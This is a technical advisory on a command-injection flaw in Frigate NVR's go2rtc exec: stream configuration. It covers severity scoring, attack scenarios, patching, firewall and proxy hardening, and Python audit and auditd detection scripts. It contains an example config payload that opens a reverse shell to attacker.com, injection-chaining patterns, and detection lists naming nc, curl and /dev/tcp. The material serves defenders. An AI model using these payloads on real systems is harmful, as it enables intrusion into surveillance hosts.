Description
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive. The go2rtc service executes these commands without restrictions. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control. This vulnerability is fixed in 0.16.4.
EPSS Score:
0%
EUVD-2026-5586: Comprehensive Technical Analysis
Executive Summary
EUVD-2026-5586 (CVE-2026-25643) is a critical Remote Command Execution (RCE) vulnerability in Frigate, a widely deployed network video recorder (NVR) with real-time object detection. It carries a CVSS v3.1 base score of 9.1 (Critical) and stems from the go2rtc integration accepting exec: stream sources from the configuration without sanitization, which permits arbitrary system command execution.
1. Vulnerability Assessment and Severity Evaluation
Technical Classification
- Vulnerability Type: Remote Command Execution (RCE) via Command Injection
- Attack Complexity: Low (AC:L)
- Privileges Required: High (PR:H) - Administrative access required
- User Interaction: None (UI:N)
- Scope: Changed (S:C) - Exploitation can affect resources beyond the vulnerable component
CVSS v3.1 Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Base Score: 9.1 (Critical)
Vector Analysis:
- AV:N (Network): Exploitable remotely over network
- AC:L (Low): No specialized conditions required for exploitation
- PR:H (High): Requires administrative privileges
- UI:N (None): No user interaction needed
- S:C (Changed): Can impact underlying system beyond application scope
- C:H/I:H/A:H: Complete compromise of confidentiality, integrity, and availability
Severity Justification
Despite requiring administrative privileges (PR:H), the 9.1 Critical rating is justified due to:
- Scope Change (S:C): Command execution at the OS level transcends application boundaries
- Complete System Compromise: Full CIA triad impact
- Deployment Context: Frigate's port 5000 carries no authentication by design, and installations that publish it directly to the internet give anyone administrative control, including the ability to edit the configuration
- Lateral Movement Potential: Compromised NVR systems often reside on internal networks with access to surveillance infrastructure
2. Attack Vectors and Exploitation Methods
Primary Attack Vector
Configuration File Injection via go2rtc Integration
The vulnerability exists in the video stream configuration mechanism: the exec: stream source in config.yaml is handed to go2rtc without sanitization, and go2rtc's exec: source is by design a command to run. Anyone who can write the stream configuration can therefore run arbitrary commands as the go2rtc process. The directive itself is the command, so shell metacharacters are a convenience for chaining, not a requirement:
# Vulnerable configuration example
go2rtc:
  streams:
    camera_stream:
      - exec:/path/to/command; malicious_command
Exploitation Scenarios
Scenario A: Authenticated Administrator Attack
Prerequisites:
- Valid administrative credentials
- Access to Frigate web interface or configuration file
Attack Flow:
- Attacker authenticates with admin credentials
- Modifies config.yaml, directly or through the web interface's configuration editor, to inject a malicious exec: directive
- go2rtc processes the configuration and executes the injected command
- Attacker gains shell access with Frigate service privileges
Example Payload:
go2rtc:
  streams:
    malicious_stream:
      - exec:ffmpeg -i /dev/null; bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Scenario B: Unauthenticated Attack (Misconfigured Installations)
Prerequisites:
- Frigate exposed to internet without authentication
- Default or weak administrative controls
Attack Flow:
- Attacker discovers exposed Frigate instance (Shodan, Censys)
- Accesses administrative interface without authentication
- Injects command execution payload via stream configuration
- Establishes persistent backdoor
Scenario C: Supply Chain/Insider Threat
Prerequisites:
- Access to configuration management systems
- Compromised CI/CD pipeline
Attack Flow:
- Malicious configuration injected through automated deployment
- Multiple Frigate instances compromised simultaneously
- Establishes command-and-control infrastructure across surveillance network
Technical Exploitation Details
Command Injection Techniques:
# Shell metacharacter injection
exec:legitimate_command; malicious_command
# Command substitution
exec:legitimate_command `malicious_command`
# Pipe chaining
exec:legitimate_command | malicious_command
# Background execution
exec:legitimate_command & malicious_command
Post-Exploitation Activities:
- Privilege escalation to root (if service runs with elevated privileges)
- Credential harvesting from configuration files
- Network reconnaissance and lateral movement
- Video feed manipulation or exfiltration
- Persistent backdoor installation
- Cryptocurrency mining deployment
3. Affected Systems and Software Versions
Affected Products
- Product: Frigate NVR
- Vendor: blakeblackshear
- Affected Versions: All versions < 0.16.4
- Fixed Version: 0.16.4 and later
Vulnerable Component
- go2rtc integration module - Real-time streaming component
- Configuration parser - YAML processing without input validation
Deployment Environments at Risk
- Home Surveillance Systems
  - Residential NVR deployments
  - Smart home integrations (Home Assistant, etc.)
- Small-to-Medium Business (SMB)
  - Retail surveillance
  - Office security systems
  - Warehouse monitoring
- Critical Infrastructure
  - Building management systems
  - Industrial facility monitoring
  - Transportation hubs
- European Deployment Considerations
  - GDPR-regulated video surveillance systems
  - Public space monitoring infrastructure
  - Cross-border surveillance networks
Detection Methods
Version Identification:
# Check the running Frigate release via the API (returns a string such as 0.16.3-<commit>)
curl http://<frigate-ip>:5000/api/version
# Docker container inspection (image tag and labels)
docker inspect frigate | grep -i version
# The version: key Frigate writes to config.yaml is the configuration schema version used by its
# config migrator, not the running release; use it only as a hint, never as the sole check
grep -n "^version" /config/config.yaml
Vulnerability Indicators:
- Frigate version < 0.16.4
- go2rtc integration enabled
- exec: directives in stream configuration
- Exposed administrative interfaces: port 5000 (Frigate's unauthenticated internal API), port 8971 (its authenticated web UI) and port 1984 (the go2rtc API)
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours)
1. Emergency Patching
# Docker deployment update. Pin the image tag in docker-compose.yml to 0.16.4 (or later) before
# pulling; a pull alone changes nothing if the compose file still references an older tag
docker pull ghcr.io/blakeblackshear/frigate:0.16.4
docker-compose down
docker-compose up -d
# Verify the running release (same endpoint as in the Detection Methods section)
curl http://<frigate-ip>:5000/api/version
2. Network Isolation
- Remove direct internet exposure
- Implement firewall rules restricting access to trusted networks
- Deploy VPN for remote access
# Example iptables rules (repeat for 8971 and for the go2rtc ports 1984, 8554 and 8555 if they are published)
iptables -A INPUT -p tcp --dport 5000 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 5000 -j DROP
# Ports published by Docker are forwarded, not delivered locally, so INPUT rules never see them;
# filter them in DOCKER-USER instead (--dport here is the container-side port after DNAT, which
# equals the published port with Frigate's usual 5000:5000 mapping)
iptables -I DOCKER-USER -p tcp --dport 5000 ! -s 192.168.1.0/24 -j DROP
3. Configuration Audit
# Search for exec: stream sources (/config is the container path; substitute the host path of the bind mount)
grep -n "exec:" /config/config.yaml
# Review for command-chaining patterns. Single quotes keep the shell from treating the backtick as
# command substitution; expect false positives from & in RTSP/HTTP query strings
grep -nE '(;|\||&|`|\$\()' /config/config.yaml
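The checks behind the Vulnerability Indicators list and the configuration audit step above can be scripted. The following is an added example, not Frigate's or go2rtc's code: it compares an /api/version string against 0.16.4 and walks the go2rtc.streams section of a parsed config.yaml for exec: sources, flagging those whose command part carries shell-chaining characters. The sample configuration, the 192.0.2.x addresses and the stream names are constructed for the example.

```python
"""Triage helpers for the go2rtc exec: exposure: is the running Frigate release
older than 0.16.4, and does the go2rtc stream configuration contain exec:
sources? Example code added here; not part of Frigate or go2rtc."""
import re

FIXED_VERSION = (0, 16, 4)
CHAIN_CHARS = re.compile(r"[;&|`]|\$\(")  # shell-chaining metacharacters


def parse_version(text):
    """Turn an /api/version string such as '0.16.3-1a2b3c4' into a tuple of ints.
    Anything after the numeric core (commit hash, beta tag) is ignored."""
    m = re.match(r"\d+(?:\.\d+)*", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_vulnerable_version(text):
    """True when the reported release predates the fixed release 0.16.4."""
    return parse_version(text) < FIXED_VERSION


def iter_stream_sources(config):
    """Yield (stream_name, source) for every go2rtc stream source in a parsed
    config.yaml; go2rtc accepts one string or a list of strings per stream."""
    streams = (config.get("go2rtc") or {}).get("streams") or {}
    for name, sources in streams.items():
        if isinstance(sources, str):
            sources = [sources]
        for src in sources or []:
            if isinstance(src, str):
                yield name, src


def audit_exec_sources(config):
    """Return one finding per exec: source: the stream, the raw source and whether
    the command part carries shell-chaining characters. A legitimate transcode
    pipeline is reported too; every exec: source is a command go2rtc will run."""
    findings = []
    for name, src in iter_stream_sources(config):
        if src.lstrip().lower().startswith("exec:"):
            command = src.split(":", 1)[1]
            findings.append({
                "stream": name,
                "source": src,
                "chained": bool(CHAIN_CHARS.search(command)),
            })
    return findings


def triage(version_text, config):
    """Combine both checks into a summary a ticket or SIEM can consume."""
    findings = audit_exec_sources(config)
    return {
        "version": version_text,
        "patch_needed": is_vulnerable_version(version_text),
        "exec_sources": findings,
        "review_needed": any(f["chained"] for f in findings),
    }


def load_config(path):
    """Load a real config.yaml. PyYAML (pip install pyyaml) is imported here so
    the audit functions above stay free of third-party dependencies."""
    import yaml
    with open(path, encoding="utf-8") as fh:
        return yaml.safe_load(fh) or {}


# Constructed sample config (not from a real deployment), shaped as yaml.safe_load
# would return it: two RTSP cameras, one ordinary exec: transcode, one payload.
SAMPLE_CONFIG = {
    "go2rtc": {
        "streams": {
            "front_door": ["rtsp://192.0.2.10:554/stream1"],
            "garage": "rtsp://192.0.2.11:554/stream1",
            "transcode": ["exec:ffmpeg -re -i rtsp://192.0.2.12/cam -c copy -f rtsp {output}"],
            "malicious_stream": [
                "exec:ffmpeg -i /dev/null; bash -c 'bash -i >& /dev/tcp/192.0.2.99/4444 0>&1'"
            ],
        }
    }
}

if __name__ == "__main__":
    import json
    # The version string would normally come from: curl http://<frigate-ip>:5000/api/version
    print(json.dumps(triage("0.16.3-1a2b3c4", SAMPLE_CONFIG), indent=2))
```

Against a live install, pair `load_config("/path/to/config.yaml")` with the string returned by /api/version. The plain transcode pipeline is still listed: exec: sources are commands the go2rtc process will run, so each one warrants a look even on a patched release, and the `chained` flag only prioritises which to read first.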
Short-Term Mitigations (Priority 2 - Within 1 Week)
4. Authentication Hardening
- Enable mandatory authentication
- Implement strong password policies
- Deploy multi-factor authentication in front of Frigate through an authenticating reverse proxy or identity provider; Frigate's built-in login is password-only
- Review and revoke unnecessary administrative accounts
5. Access Control Implementation
- Frigate's port 5000 carries no authentication of its own, so bind it to localhost or a private network and reach it only through the proxy
# Implement reverse proxy with authentication (example nginx configuration; the WebSocket upgrade headers are needed for live views)
server {
    listen 443 ssl;
    ssl_certificate     /etc/nginx/certs/frigate.crt;
    ssl_certificate_key /etc/nginx/certs/frigate.key;
    location / {
        auth_basic "Restricted Access";
        auth_basic_user_file /etc/nginx/.htpasswd;
        proxy_pass http://frigate:5000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
    }
}
6. Monitoring and Detection
- Enable comprehensive logging
- Monitor for configuration changes
- Implement SIEM integration for anomaly detection
# Monitor configuration file changes (use the host path of the bind mount that backs /config in the container)
auditctl -w /config/config.yaml -p wa -k frigate_config_change
# Record every execve so children spawned by go2rtc can be reviewed (ffmpeg is expected; bash, nc or
# curl are not). A file watch on /proc does not capture process execution; a syscall rule does
auditctl -a always,exit -F arch=b64 -S execve -k frigate_exec
auditctl -a always,exit -F arch=b32 -S execve -k frigate_exec
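The execve records that an auditd rule produces can be reviewed for children a video pipeline has no reason to spawn. The following is an added example, not part of Frigate, go2rtc or auditd; it assumes an execve rule keyed frigate_exec (for instance `auditctl -a always,exit -F arch=b64 -S execve -k frigate_exec`), groups SYSCALL and EXECVE records by audit serial, decodes the hex-encoded arguments auditd emits for values containing spaces, and alerts on interpreters, network tools and reverse-shell patterns. The log lines, PIDs and addresses are constructed for the example, not captured from a host.

```python
"""Review auditd execve records for child processes a Frigate/go2rtc host should
not be spawning. Example code added here; not part of Frigate, go2rtc or auditd.
Assumes an execve rule keyed frigate_exec. Sample log lines are constructed."""
import os
import re
from collections import defaultdict

WATCH_KEY = "frigate_exec"
# ffmpeg is the only child a stream pipeline is expected to spawn; interpreters
# and download/network tools are what an exec: payload would reach for
SUSPICIOUS_BINARIES = {"bash", "sh", "dash", "zsh", "nc", "ncat", "socat",
                       "curl", "wget", "python", "python3", "perl"}
SUSPICIOUS_PATTERNS = re.compile(r"/dev/tcp/|/dev/udp/|\bbase64\b|chmod \+x")

EVENT_ID = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
ARG_NAME = re.compile(r"a(\d+)")


def decode_arg(raw):
    """auditd writes EXECVE arguments containing spaces or quotes as unquoted
    uppercase hex; plain arguments are double-quoted."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw


def parse_events(lines):
    """Group SYSCALL and EXECVE records by audit serial and return
    {serial: {"syscall": {field: raw}, "argv": [decoded args in order]}}."""
    events = defaultdict(lambda: {"syscall": {}, "args": {}})
    for line in lines:
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = dict(FIELD.findall(line))
        ev = events[m.group(1)]
        if fields.get("type") == "SYSCALL":
            ev["syscall"] = fields
        elif fields.get("type") == "EXECVE":
            for name, raw in fields.items():
                am = ARG_NAME.fullmatch(name)  # a0, a1, ... but not argc or arch
                if am:
                    ev["args"][int(am.group(1))] = decode_arg(raw)
    return {serial: {"syscall": ev["syscall"],
                     "argv": [ev["args"][i] for i in sorted(ev["args"])]}
            for serial, ev in events.items()}


def detect(lines):
    """Return one alert per execve under WATCH_KEY whose argv names an
    interpreter/network tool or contains a reverse-shell or download pattern."""
    alerts = []
    for serial, ev in parse_events(lines).items():
        if ev["syscall"].get("key", "").strip('"') != WATCH_KEY or not ev["argv"]:
            continue
        cmdline = " ".join(ev["argv"])
        reasons = []
        binary = os.path.basename(ev["argv"][0])
        if binary in SUSPICIOUS_BINARIES:
            reasons.append(f"unexpected child {binary!r}")
        if SUSPICIOUS_PATTERNS.search(cmdline):
            reasons.append("reverse-shell or download pattern")
        if reasons:
            alerts.append({"serial": serial, "pid": ev["syscall"].get("pid"),
                           "exe": ev["syscall"].get("exe", "").strip('"'),
                           "cmdline": cmdline, "reasons": reasons})
    return alerts


def _hex(s):
    """Mimic auditd's hex encoding for the constructed sample below."""
    return s.encode().hex().upper()


REVERSE_SHELL = "bash -i >& /dev/tcp/192.0.2.99/4444 0>&1"
SAMPLE_LOG = [
    # serial 4321: go2rtc's exec: source spawning bash -c with a reverse shell
    'type=SYSCALL msg=audit(1700000000.123:4321): arch=c000003e syscall=59 success=yes '
    'exit=0 ppid=812 pid=913 uid=0 comm="bash" exe="/usr/bin/bash" key="frigate_exec"',
    f'type=EXECVE msg=audit(1700000000.123:4321): argc=3 a0="bash" a1="-c" a2={_hex(REVERSE_SHELL)}',
    # serial 4322: an ordinary ffmpeg child under the same key; no alert expected
    'type=SYSCALL msg=audit(1700000000.500:4322): arch=c000003e syscall=59 success=yes '
    'exit=0 ppid=812 pid=914 uid=0 comm="ffmpeg" exe="/usr/bin/ffmpeg" key="frigate_exec"',
    'type=EXECVE msg=audit(1700000000.500:4322): argc=8 a0="ffmpeg" a1="-i" '
    'a2="rtsp://192.0.2.10:554/stream1" a3="-c" a4="copy" a5="-f" a6="null" a7="-"',
    # serial 4323: a shell started by cron, outside the watch key; ignored
    'type=SYSCALL msg=audit(1700000001.000:4323): arch=c000003e syscall=59 success=yes '
    'exit=0 ppid=1 pid=950 uid=0 comm="sh" exe="/usr/bin/dash" key=(null)',
    'type=EXECVE msg=audit(1700000001.000:4323): argc=2 a0="sh" a1="/etc/cron.hourly/job"',
]

if __name__ == "__main__":
    # Real use: detect(open("/var/log/audit/audit.log").read().splitlines())
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The key filter is what keeps the rule usable on a host that runs other services: only records tagged by the Frigate execve rule are examined, and ffmpeg children pass silently. Tightening it to the go2rtc binary (an `-F exe=` filter on the rule) is possible once the path inside your image is confirmed.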